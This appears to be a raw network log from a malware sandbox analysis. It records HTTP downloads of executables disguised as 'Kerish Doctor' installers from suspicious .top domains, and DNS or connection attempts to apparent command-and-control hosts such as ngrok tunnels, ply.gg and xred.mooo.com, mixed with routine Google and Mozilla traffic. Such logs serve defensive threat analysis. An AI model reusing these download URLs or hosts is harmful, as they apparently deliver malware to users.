11696

HTTP Request

GET http://wt-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_XP.exe

HTTP Response

200
13.202.226.61:10147

0.tcp.in.ngrok.io

260 B
200 B
5
5
185.215.113.16:80

260 B
5
185.221.219.112:80

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows.exe

http

294.3kB
19.7MB
6125
14139

HTTP Request

GET http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows.exe

HTTP Response

200
116.203.56.216:1604

wzt5xcg.localto.net

260 B
200 B
5
5
37.140.192.16:80

moonloaderupdate.ru

260 B
5
147.185.221.25:11758

other-little.gl.at.ply.gg

260 B
5
89.23.101.77:1912

260 B
5
35.190.72.216:443

location.services.mozilla.com

tls

2.2kB
4.8kB
20
18
20.107.53.25:25535

260 B
5
34.149.97.1:443

firefox-api-proxy.cdn.mozilla.net

tls

1.9kB
13.4kB
14
20
31.41.244.11:80

260 B
5
185.221.219.112:80

http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.exe

http

307.9kB
20.6MB
6382
14775

HTTP Request

GET http://www.fexe-tmp-1.top/get/415oaux32/Kerish_Doctor_Windows_8.exe

HTTP Response

200
34.120.158.37:443

tracking-protection.cdn.mozilla.net

tls

2.5kB
62.6kB
27
54
217.195.197.170:1604

260 B
200 B
5
5
185.221.219.112:80

http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2017.exe

http

256.2kB
17.8MB
5273
12761

HTTP Request

GET http://wiso-fs-1.top/get/415oaux32/Kerish_Doctor_2017.exe

HTTP Response

200

8.8.8.8:53

64.159.190.20.in-addr.arpa

dns

Dnscache

72 B
158 B
1
1

DNS Request

64.159.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

Dnscache

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

Dnscache

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

30.243.111.52.in-addr.arpa

dns

Dnscache

72 B
158 B
1
1

DNS Request

30.243.111.52.in-addr.arpa
8.8.8.8:53

checkappexec.microsoft.com

dns

Dnscache

72 B
192 B
1
1

DNS Request

checkappexec.microsoft.com

DNS Response

13.87.96.169
8.8.8.8:53

169.96.87.13.in-addr.arpa

dns

Dnscache

71 B
145 B
1
1

DNS Request

169.96.87.13.in-addr.arpa
8.8.8.8:53

urlhaus.abuse.ch

dns

._cache_New Text Document mod.exe

62 B
167 B
1
1

DNS Request

urlhaus.abuse.ch

DNS Response

151.101.194.49

151.101.66.49

151.101.130.49

151.101.2.49
8.8.8.8:53

raw.githubusercontent.com

dns

._cache_New Text Document mod.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133
8.8.8.8:53

49.194.101.151.in-addr.arpa

dns

Dnscache

73 B
133 B
1
1

DNS Request

49.194.101.151.in-addr.arpa
8.8.8.8:53

133.111.199.185.in-addr.arpa

dns

Dnscache

74 B
118 B
1
1

DNS Request

133.111.199.185.in-addr.arpa
8.8.8.8:53

88.92.177.195.in-addr.arpa

dns

Dnscache

72 B
135 B
1
1

DNS Request

88.92.177.195.in-addr.arpa
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

74.204.58.216.in-addr.arpa

dns

Dnscache

72 B
171 B
1
1

DNS Request

74.204.58.216.in-addr.arpa
8.8.8.8:53

3.178.250.142.in-addr.arpa

dns

Dnscache

72 B
110 B
1
1

DNS Request

3.178.250.142.in-addr.arpa
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

Dnscache

74 B
112 B
1
1

DNS Request

196.187.250.142.in-addr.arpa
142.250.187.196:443

www.google.com

https

chrome.exe

3.2kB
11.3kB
14
16
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

142.250.187.238
142.250.187.238:443

clients2.google.com

https

chrome.exe

2.4kB
8.1kB
9
12
224.0.0.251:5353

Dnscache

522 B
8
8.8.8.8:53

xred.mooo.com

dns

Synaptics.exe

59 B
118 B
1
1

DNS Request

xred.mooo.com
8.8.8.8:53

freedns.afraid.org

dns

Synaptics.exe

64 B
80 B
1
1

DNS Request

freedns.afraid.org

DNS Response

69.42.215.252
8.8.8.8:53

other-little.gl.at.ply.gg

dns

DirectX111.exe

71 B
87 B
1
1

DNS Request

other-little.gl.at.ply.gg

DNS Response

147.185.221.25
8.8.8.8:53

238.187.250.142.in-addr.arpa

dns

Dnscache

74 B
113 B
1
1

DNS Request

238.187.250.142.in-addr.arpa
8.8.8.8:53

252.215.42.69.in-addr.arpa

dns

Dnscache

144 B
144 B
2
2

DNS Request

252.215.42.69.in-addr.arpa

DNS Request

252.215.42.69.in-addr.arpa
8.8.8.8:53

16.173.189.20.in-addr.arpa

dns

Dnscache

72 B
158 B
1
1

DNS Request

16.173.189.20.in-addr.arpa
8.8.8.8:53

drive.google.com

dns

firefox.exe

62 B
78 B
1
1

DNS Request

drive.google.com

DNS Response

172.217.169.78
8.8.8.8:53

accounts.google.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.251.173.84
142.251.173.84:443

accounts.google.com

https

chrome.exe

2.9kB
8.4kB
10
11
8.8.8.8:53

workspace.google.com

dns

firefox.exe

66 B
82 B
1
1

DNS Request

workspace.google.com

DNS Response

142.250.200.46
8.8.8.8:53

78.169.217.172.in-addr.arpa

dns

Dnscache

73 B
112 B
1
1

DNS Request

78.169.217.172.in-addr.arpa
8.8.8.8:53

84.173.251.142.in-addr.arpa

dns

Dnscache

139 B
200 B
2
2

DNS Request

84.173.251.142.in-addr.arpa

DNS Request

workspace.google.com

DNS Response

2a00:1450:4009:823::200e
142.250.200.46:443

workspace.google.com

https

chrome.exe

8.6kB
36.2kB
52
72
8.8.8.8:53

lh3.googleusercontent.com

dns

firefox.exe

71 B
116 B
1
1

DNS Request

lh3.googleusercontent.com

DNS Response

142.250.200.33
8.8.8.8:53

storage.googleapis.com

dns

firefox.exe

68 B
292 B
1
1

DNS Request

storage.googleapis.com

DNS Response

216.58.204.91

142.250.178.27

216.58.212.219

216.58.201.123

216.58.212.251

142.250.187.251

172.217.16.251

142.250.187.219

172.217.169.91

142.250.180.27

216.58.213.27

142.250.200.27

142.250.200.59

142.250.179.251
8.8.8.8:53

ssl.google-analytics.com

dns

firefox.exe

70 B
86 B
1
1

DNS Request

ssl.google-analytics.com

DNS Response

216.58.204.72
8.8.8.8:53

content-autofill.googleapis.com

dns

chrome.exe

77 B
317 B
1
1

DNS Request

content-autofill.googleapis.com

DNS Response

216.58.201.106

142.250.187.202

172.217.169.74

172.217.169.10

142.250.180.10

216.58.212.234

142.250.187.234

172.217.16.234

142.250.200.42

216.58.204.74

216.58.212.202

142.250.179.234

142.250.200.10

172.217.169.42

142.250.178.10
142.250.200.33:443

lh3.googleusercontent.com

https

chrome.exe

2.9kB
7.3kB
5
8
8.8.8.8:53

46.200.250.142.in-addr.arpa

dns

Dnscache

73 B
112 B
1
1

DNS Request

46.200.250.142.in-addr.arpa
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

Dnscache

74 B
112 B
1
1

DNS Request

227.187.250.142.in-addr.arpa
8.8.8.8:53

195.187.250.142.in-addr.arpa

dns

Dnscache

216 B
334 B
3
3

DNS Request

195.187.250.142.in-addr.arpa

DNS Request

71.96.94.141.in-addr.arpa

DNS Request

71.96.94.141.in-addr.arpa
8.8.8.8:53

33.200.250.142.in-addr.arpa

dns

Dnscache

73 B
111 B
1
1

DNS Request

33.200.250.142.in-addr.arpa
8.8.8.8:53

72.204.58.216.in-addr.arpa

dns

Dnscache

72 B
169 B
1
1

DNS Request

72.204.58.216.in-addr.arpa
8.8.8.8:53

91.204.58.216.in-addr.arpa

dns

Dnscache

72 B
171 B
1
1

DNS Request

91.204.58.216.in-addr.arpa
8.8.8.8:53

106.201.58.216.in-addr.arpa

dns

Dnscache

73 B
173 B
1
1

DNS Request

106.201.58.216.in-addr.arpa
8.8.8.8:53

region1.google-analytics.com

dns

firefox.exe

74 B
106 B
1
1

DNS Request

region1.google-analytics.com

DNS Response

216.239.34.36

216.239.32.36
8.8.8.8:53

apis.google.com

dns

firefox.exe

122 B
196 B
2
2

DNS Request

apis.google.com

DNS Request

apis.google.com

DNS Response

142.250.178.14

DNS Response

142.250.178.14
8.8.8.8:53

14.200.250.142.in-addr.arpa

dns

Dnscache

73 B
112 B
1
1

DNS Request

14.200.250.142.in-addr.arpa
8.8.8.8:53

36.34.239.216.in-addr.arpa

dns

Dnscache

72 B
132 B
1
1

DNS Request

36.34.239.216.in-addr.arpa
8.8.8.8:53

14.178.250.142.in-addr.arpa

dns

Dnscache

73 B
112 B
1
1

DNS Request

14.178.250.142.in-addr.arpa
8.8.8.8:53

www.mozilla.org

dns

firefox.exe

122 B
332 B
2
2

DNS Request

www.mozilla.org

DNS Response

151.101.131.19

151.101.195.19

151.101.67.19

151.101.3.19

DNS Request

www.mozilla.org

DNS Response

151.101.3.19

151.101.195.19

151.101.67.19

151.101.131.19
8.8.8.8:53

www-mozilla.fastly-edge.com

dns

firefox.exe

73 B
137 B
1
1

DNS Request

www-mozilla.fastly-edge.com

DNS Response

151.101.67.19

151.101.131.19

151.101.3.19

151.101.195.19
8.8.8.8:53

www-mozilla.fastly-edge.com

dns

firefox.exe

73 B
185 B
1
1

DNS Request

www-mozilla.fastly-edge.com

DNS Response

2a04:4e42:600::787

2a04:4e42:400::787

2a04:4e42::787

2a04:4e42:200::787
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

130 B
262 B
2
2

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

206 B
262 B
2
2

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

332 B
642 B
4
4

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

172.60.21.104.in-addr.arpa

DNS Request

172.60.21.104.in-addr.arpa
8.8.8.8:53

19.131.101.151.in-addr.arpa

dns

Dnscache

73 B
133 B
1
1

DNS Request

19.131.101.151.in-addr.arpa
8.8.8.8:53

firefox-api-proxy.cdn.mozilla.net

dns

firefox.exe

79 B
160 B
1
1

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Response

34.149.97.1
34.149.97.1:443

firefox-api-proxy.cdn.mozilla.net

https

firefox.exe

2.2kB
13.5kB
9
14
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

100 B
116 B
1
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

200 B
256 B
2
2

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::

DNS Response

2600:1901:0:74e4::
8.8.8.8:53

drive.google.com

dns

firefox.exe

124 B
156 B
2
2

DNS Request

drive.google.com

DNS Request

drive.google.com

DNS Response

172.217.169.78

DNS Response

172.217.169.78
8.8.8.8:53

drive.google.com

dns

firefox.exe

124 B
180 B
2
2

DNS Request

drive.google.com

DNS Request

drive.google.com

DNS Response

2a00:1450:4009:819::200e

DNS Response

2a00:1450:4009:819::200e
172.217.169.78:443

drive.google.com

https

firefox.exe

194.7kB
3.0MB
500
2304
8.8.8.8:53

accounts.google.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.251.173.84
8.8.8.8:53

accounts.google.com

dns

firefox.exe

130 B
186 B
2
2

DNS Request

accounts.google.com

DNS Request

accounts.google.com

DNS Response

2a00:1450:400c:c1f::54

DNS Response

2a00:1450:400c:c1f::54
142.251.173.84:443

accounts.google.com

https

firefox.exe

39.2kB
242.3kB
124
248
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

120 B
176 B
2
2

DNS Request

www.google.com

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004

DNS Response

2a00:1450:4009:81f::2004
142.250.187.196:443

www.google.com

https

firefox.exe

6.6kB
36.0kB
21
38
8.8.8.8:53

workspace.google.com

dns

firefox.exe

132 B
164 B
2
2

DNS Request

workspace.google.com

DNS Request

workspace.google.com

DNS Response

142.250.200.46

DNS Response

142.250.200.46
142.250.200.46:443

workspace.google.com

https

firefox.exe

24.3kB
127.4kB
101
181
8.8.8.8:53

lh3.googleusercontent.com

dns

firefox.exe

71 B
116 B
1
1

DNS Request

lh3.googleusercontent.com

DNS Response

142.250.200.33
8.8.8.8:53

googlehosted.l.googleusercontent.com

dns

firefox.exe

82 B
98 B
1
1

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

142.250.200.33
8.8.8.8:53

googlehosted.l.googleusercontent.com

dns

firefox.exe

164 B
220 B
2
2

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

2a00:1450:4009:823::2001

DNS Request

googlehosted.l.googleusercontent.com

DNS Response

2a00:1450:4009:823::2001
142.250.200.33:443

googlehosted.l.googleusercontent.com

https

firefox.exe

11.2kB
342.8kB
101
266
8.8.8.8:53

storage.googleapis.com

dns

firefox.exe

136 B
584 B
2
2

DNS Request

storage.googleapis.com

DNS Request

storage.googleapis.com

DNS Response

172.217.16.251

142.250.200.59

216.58.201.123

216.58.204.91

142.250.179.251

142.250.200.27

216.58.212.251

142.250.178.27

216.58.213.27

142.250.180.27

216.58.212.219

172.217.169.91

142.250.187.251

142.250.187.219

DNS Response

216.58.204.91

216.58.212.251

172.217.16.251

216.58.201.123

142.250.179.251

216.58.213.27

172.217.169.91

142.250.180.27

142.250.187.219

142.250.200.59

142.250.178.27

216.58.212.219

142.250.187.251

142.250.200.27
8.8.8.8:53

ssl.google-analytics.com

dns

firefox.exe

140 B
172 B
2
2

DNS Request

ssl.google-analytics.com

DNS Request

ssl.google-analytics.com

DNS Response

142.250.178.8

DNS Response

142.250.187.200
8.8.8.8:53

storage.googleapis.com

dns

firefox.exe

136 B
360 B
2
2

DNS Request

storage.googleapis.com

DNS Response

2a00:1450:4009:81f::201b

2a00:1450:4009:81d::201b

2a00:1450:4009:819::201b

2a00:1450:4009:81e::201b

DNS Request

storage.googleapis.com

DNS Response

2a00:1450:4009:819::201b

2a00:1450:4009:81f::201b

2a00:1450:4009:81d::201b

2a00:1450:4009:81e::201b
8.8.8.8:53

ssl.google-analytics.com

dns

firefox.exe

140 B
196 B
2
2

DNS Request

ssl.google-analytics.com

DNS Response

2a00:1450:4009:80a::2008

DNS Request

ssl.google-analytics.com

DNS Response

2a00:1450:4009:80a::2008
172.217.16.251:443

storage.googleapis.com

https

firefox.exe

1.9kB
6.7kB
7
8
142.250.178.8:443

ssl.google-analytics.com

https

firefox.exe

3.7kB
8.5kB
11
13
8.8.8.8:53

250.187.63.66.in-addr.arpa

dns

Dnscache

144 B
268 B
2
2

DNS Request

250.187.63.66.in-addr.arpa

DNS Request

250.187.63.66.in-addr.arpa
8.8.8.8:53

251.16.217.172.in-addr.arpa

dns

Dnscache

73 B
142 B
1
1

DNS Request

251.16.217.172.in-addr.arpa
8.8.8.8:53

8.178.250.142.in-addr.arpa

dns

Dnscache

72 B
110 B
1
1

DNS Request

8.178.250.142.in-addr.arpa
8.8.8.8:53

region1.google-analytics.com

dns

firefox.exe

74 B
106 B
1
1

DNS Request

region1.google-analytics.com

DNS Response

216.239.34.36

216.239.32.36
8.8.8.8:53

stats.g.doubleclick.net

dns

firefox.exe

233 B
329 B
3
3

DNS Request

stats.g.doubleclick.net

DNS Response

64.233.184.156

64.233.184.155

64.233.184.157

64.233.184.154

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

216.58.204.74

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

216.58.212.234
8.8.8.8:53

stats.g.doubleclick.net

dns

firefox.exe

69 B
133 B
1
1

DNS Request

stats.g.doubleclick.net

DNS Response

64.233.184.156

64.233.184.154

64.233.184.157

64.233.184.155
8.8.8.8:53

region1.google-analytics.com

dns

firefox.exe

74 B
130 B
1
1

DNS Request

region1.google-analytics.com

DNS Response

2001:4860:4802:34::36

2001:4860:4802:32::36
8.8.8.8:53

apis.google.com

dns

firefox.exe

61 B
98 B
1
1

DNS Request

apis.google.com

DNS Response

142.250.178.14
8.8.8.8:53

stats.g.doubleclick.net

dns

firefox.exe

138 B
362 B
2
2

DNS Request

stats.g.doubleclick.net

DNS Response

2a00:1450:400c:c0b::9d

2a00:1450:400c:c0b::9b

2a00:1450:400c:c0b::9c

2a00:1450:400c:c0b::9a

DNS Request

stats.g.doubleclick.net

DNS Response

2a00:1450:400c:c0b::9a

2a00:1450:400c:c0b::9b

2a00:1450:400c:c0b::9d

2a00:1450:400c:c0b::9c
8.8.8.8:53

plus.l.google.com

dns

firefox.exe

126 B
158 B
2
2

DNS Request

plus.l.google.com

DNS Request

plus.l.google.com

DNS Response

142.250.178.14

DNS Response

142.250.178.14
8.8.8.8:53

plus.l.google.com

dns

firefox.exe

126 B
182 B
2
2

DNS Request

plus.l.google.com

DNS Request

plus.l.google.com

DNS Response

2a00:1450:4009:815::200e

DNS Response

2a00:1450:4009:815::200e
64.233.184.156:443

stats.g.doubleclick.net

https

firefox.exe

1.8kB
6.9kB
6
8
216.239.34.36:443

region1.google-analytics.com

https

firefox.exe

3.0kB
7.9kB
8
10
142.250.178.14:443

plus.l.google.com

https

firefox.exe

35.1kB
589.1kB
121
469
8.8.8.8:53

feedback-pa.clients6.google.com

dns

firefox.exe

154 B
186 B
2
2

DNS Request

feedback-pa.clients6.google.com

DNS Request

feedback-pa.clients6.google.com

DNS Response

142.250.179.234

DNS Response

142.250.178.10
8.8.8.8:53

feedback-pa.clients6.google.com

dns

firefox.exe

77 B
93 B
1
1

DNS Request

feedback-pa.clients6.google.com

DNS Response

142.250.179.234
8.8.8.8:53

feedback-pa.clients6.google.com

dns

firefox.exe

154 B
210 B
2
2

DNS Request

feedback-pa.clients6.google.com

DNS Request

feedback-pa.clients6.google.com

DNS Response

2a00:1450:4009:81d::200a

DNS Response

2a00:1450:4009:815::200a
142.250.179.234:443

feedback-pa.clients6.google.com

https

firefox.exe

3.9kB
13.9kB
13
18
8.8.8.8:53

156.184.233.64.in-addr.arpa

dns

Dnscache

73 B
107 B
1
1

DNS Request

156.184.233.64.in-addr.arpa
8.8.8.8:53

234.179.250.142.in-addr.arpa

dns

Dnscache

74 B
113 B
1
1

DNS Request

234.179.250.142.in-addr.arpa
8.8.8.8:53

accounts.youtube.com

dns

firefox.exe

132 B
220 B
2
2

DNS Request

accounts.youtube.com

DNS Response

142.250.178.14

DNS Request

accounts.youtube.com

DNS Response

142.250.178.14
8.8.8.8:53

www3.l.google.com

dns

firefox.exe

126 B
158 B
2
2

DNS Request

www3.l.google.com

DNS Response

142.250.178.14

DNS Request

www3.l.google.com

DNS Response

142.250.178.14
8.8.8.8:53

www3.l.google.com

dns

firefox.exe

63 B
91 B
1
1

DNS Request

www3.l.google.com

DNS Response

2a00:1450:4009:815::200e
142.250.178.14:443

www3.l.google.com

https

firefox.exe

2.2kB
9.4kB
10
11
8.8.8.8:53

play.google.com

dns

firefox.exe

122 B
154 B
2
2

DNS Request

play.google.com

DNS Request

play.google.com

DNS Response

142.250.179.238

DNS Response

142.250.179.238
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.238
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
89 B
1
1

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e
142.250.179.238:443

play.google.com

https

firefox.exe

520.1kB
22.4MB
1566
16570
8.8.8.8:53

238.179.250.142.in-addr.arpa

dns

Dnscache

74 B
113 B
1
1

DNS Request

238.179.250.142.in-addr.arpa
142.250.178.14:443

www3.l.google.com

https

firefox.exe

2.0kB
9.3kB
8
10
8.8.8.8:53

accounts.google.co.uk

dns

firefox.exe

67 B
124 B
1
1

DNS Request

accounts.google.co.uk

DNS Response

66.102.1.94
8.8.8.8:53

accounts-cctld.l.google.com

dns

firefox.exe

146 B
178 B
2
2

DNS Request

accounts-cctld.l.google.com

DNS Request

accounts-cctld.l.google.com

DNS Response

66.102.1.94

DNS Response

66.102.1.94
8.8.8.8:53

accounts-cctld.l.google.com

dns

firefox.exe

73 B
101 B
1
1

DNS Request

accounts-cctld.l.google.com

DNS Response

2a00:1450:400c:c06::5e
66.102.1.94:443

accounts-cctld.l.google.com

https

firefox.exe

1.9kB
6.7kB
7
8
8.8.8.8:53

ssl.gstatic.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

ssl.gstatic.com

DNS Response

142.250.200.3
8.8.8.8:53

lh3.google.com

dns

firefox.exe

120 B
192 B
2
2

DNS Request

lh3.google.com

DNS Request

lh3.google.com

DNS Response

216.58.212.238

DNS Response

216.58.212.238
8.8.8.8:53

ssl.gstatic.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

ssl.gstatic.com

DNS Response

142.250.200.3
8.8.8.8:53

lh2.l.google.com

dns

firefox.exe

124 B
156 B
2
2

DNS Request

lh2.l.google.com

DNS Response

216.58.212.238

DNS Request

lh2.l.google.com

DNS Response

216.58.212.238
8.8.8.8:53

ssl.gstatic.com

dns

firefox.exe

61 B
89 B
1
1

DNS Request

ssl.gstatic.com

DNS Response

2a00:1450:4009:822::2003
8.8.8.8:53

lh2.l.google.com

dns

firefox.exe

124 B
180 B
2
2

DNS Request

lh2.l.google.com

DNS Request

lh2.l.google.com

DNS Response

2a00:1450:4009:80b::200e

DNS Response

2a00:1450:4009:80b::200e
142.250.200.3:443

ssl.gstatic.com

https

firefox.exe

11.3kB
268.7kB
90
248
216.58.212.238:443

lh2.l.google.com

https

firefox.exe

1.8kB
9.3kB
6
10
8.8.8.8:53

94.1.102.66.in-addr.arpa

dns

Dnscache

70 B
103 B
1
1

DNS Request

94.1.102.66.in-addr.arpa
8.8.8.8:53

3.200.250.142.in-addr.arpa

dns

Dnscache

72 B
110 B
1
1

DNS Request

3.200.250.142.in-addr.arpa
8.8.8.8:53

238.212.58.216.in-addr.arpa

dns

Dnscache

146 B
346 B
2
2

DNS Request

238.212.58.216.in-addr.arpa

DNS Request

238.212.58.216.in-addr.arpa
8.8.8.8:53

drive-thirdparty.googleusercontent.com

dns

firefox.exe

168 B
258 B
2
2

DNS Request

drive-thirdparty.googleusercontent.com

DNS Request

drive-thirdparty.googleusercontent.com

DNS Response

142.250.200.33

DNS Response

142.250.200.33
142.250.200.33:443

drive-thirdparty.googleusercontent.com

https

firefox.exe

2.3kB
12.1kB
11
13
8.8.8.8:53

clients6.google.com

dns

firefox.exe

130 B
210 B
2
2

DNS Request

clients6.google.com

DNS Response

142.250.187.238

DNS Request

clients6.google.com

DNS Response

142.250.187.238
8.8.8.8:53

clients.l.google.com

dns

firefox.exe

132 B
164 B
2
2

DNS Request

clients.l.google.com

DNS Response

142.250.187.238

DNS Request

clients.l.google.com

DNS Response

142.250.187.238
8.8.8.8:53

clients.l.google.com

dns

firefox.exe

66 B
94 B
1
1

DNS Request

clients.l.google.com

DNS Response

2a00:1450:4009:820::200e
8.8.8.8:53

ogads-pa.clients6.google.com

dns

firefox.exe

74 B
90 B
1
1

DNS Request

ogads-pa.clients6.google.com

DNS Response

142.250.187.234
8.8.8.8:53

waa-pa.clients6.google.com

dns

firefox.exe

144 B
176 B
2
2

DNS Request

waa-pa.clients6.google.com

DNS Response

216.58.201.106

DNS Request

waa-pa.clients6.google.com

DNS Response

216.58.201.106
8.8.8.8:53

ogads-pa.clients6.google.com

dns

firefox.exe

148 B
180 B
2
2

DNS Request

ogads-pa.clients6.google.com

DNS Response

142.250.180.10

DNS Request

ogads-pa.clients6.google.com

DNS Response

142.250.187.234
8.8.8.8:53

waa-pa.clients6.google.com

dns

firefox.exe

144 B
176 B
2
2

DNS Request

waa-pa.clients6.google.com

DNS Request

waa-pa.clients6.google.com

DNS Response

142.250.180.10

DNS Response

172.217.169.42
8.8.8.8:53

ogads-pa.clients6.google.com

dns

firefox.exe

148 B
204 B
2
2

DNS Request

ogads-pa.clients6.google.com

DNS Request

ogads-pa.clients6.google.com

DNS Response

2a00:1450:4009:823::200a

DNS Response

2a00:1450:4009:823::200a
142.250.187.238:443

clients.l.google.com

https

firefox.exe

9.8kB
293.5kB
60
234
8.8.8.8:53

waa-pa.clients6.google.com

dns

firefox.exe

144 B
200 B
2
2

DNS Request

waa-pa.clients6.google.com

DNS Response

2a00:1450:4009:81f::200a

DNS Request

waa-pa.clients6.google.com

DNS Response

2a00:1450:4009:819::200a
216.58.201.106:443

waa-pa.clients6.google.com

https

firefox.exe

9.0kB
28.1kB
23
33
142.250.187.234:443

ogads-pa.clients6.google.com

https

firefox.exe

2.1kB
12.5kB
10
12
8.8.8.8:53

234.187.250.142.in-addr.arpa

dns

Dnscache

74 B
113 B
1
1

DNS Request

234.187.250.142.in-addr.arpa
216.58.201.106:443

waa-pa.clients6.google.com

https

firefox.exe

2.5kB
13.0kB
10
15
8.8.8.8:53

drivefrontend-pa.clients6.google.com

dns

firefox.exe

82 B
98 B
1
1

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

216.58.204.74
8.8.8.8:53

drivefrontend-pa.clients6.google.com

dns

firefox.exe

82 B
110 B
1
1

DNS Request

drivefrontend-pa.clients6.google.com

DNS Response

2a00:1450:4009:820::200a
8.8.8.8:53

people-pa.clients6.google.com

dns

firefox.exe

150 B
182 B
2
2

DNS Request

people-pa.clients6.google.com

DNS Request

people-pa.clients6.google.com

DNS Response

216.58.213.10

DNS Response

142.250.180.10
8.8.8.8:53

people-pa.clients6.google.com

dns

firefox.exe

75 B
91 B
1
1

DNS Request

people-pa.clients6.google.com

DNS Response

216.58.213.10
8.8.8.8:53

people-pa.clients6.google.com

dns

firefox.exe

150 B
206 B
2
2

DNS Request

people-pa.clients6.google.com

DNS Response

2a00:1450:4009:826::200a

DNS Request

people-pa.clients6.google.com

DNS Response

2a00:1450:4009:826::200a
8.8.8.8:53

appsgrowthpromo-pa.clients6.google.com

dns

firefox.exe

168 B
200 B
2
2

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

216.58.201.106

DNS Response

216.58.201.106
216.58.213.10:443

people-pa.clients6.google.com

https

firefox.exe

8.3kB
15.0kB
19
22
8.8.8.8:53

appsgrowthpromo-pa.clients6.google.com

dns

firefox.exe

168 B
200 B
2
2

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

142.250.179.234

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

142.250.179.234
216.58.201.106:443

appsgrowthpromo-pa.clients6.google.com

https

firefox.exe

2.2kB
12.6kB
10
13
8.8.8.8:53

appsgrowthpromo-pa.clients6.google.com

dns

firefox.exe

84 B
112 B
1
1

DNS Request

appsgrowthpromo-pa.clients6.google.com

DNS Response

2a00:1450:4009:81d::200a
8.8.8.8:53

addons-pa.clients6.google.com

dns

firefox.exe

75 B
91 B
1
1

DNS Request

addons-pa.clients6.google.com

DNS Response

172.217.16.234
8.8.8.8:53

addons-pa.clients6.google.com

dns

firefox.exe

150 B
91 B
2
1

DNS Request

addons-pa.clients6.google.com

DNS Request

addons-pa.clients6.google.com

DNS Response

142.250.200.42
8.8.8.8:53

addons-pa.clients6.google.com

dns

firefox.exe

150 B
103 B
2
1

DNS Request

addons-pa.clients6.google.com

DNS Request

addons-pa.clients6.google.com

DNS Response

2a00:1450:4009:821::200a
172.217.16.234:443

addons-pa.clients6.google.com

https

firefox.exe

4.5kB
14.0kB
14
16
8.8.8.8:53

10.213.58.216.in-addr.arpa

dns

Dnscache

144 B
282 B
2
2

DNS Request

10.213.58.216.in-addr.arpa

DNS Request

10.213.58.216.in-addr.arpa
8.8.8.8:53

42.200.250.142.in-addr.arpa

dns

Dnscache

146 B
224 B
2
2

DNS Request

42.200.250.142.in-addr.arpa

DNS Request

42.200.250.142.in-addr.arpa
8.8.8.8:53

234.16.217.172.in-addr.arpa

dns

Dnscache

146 B
284 B
2
2

DNS Request

234.16.217.172.in-addr.arpa

DNS Request

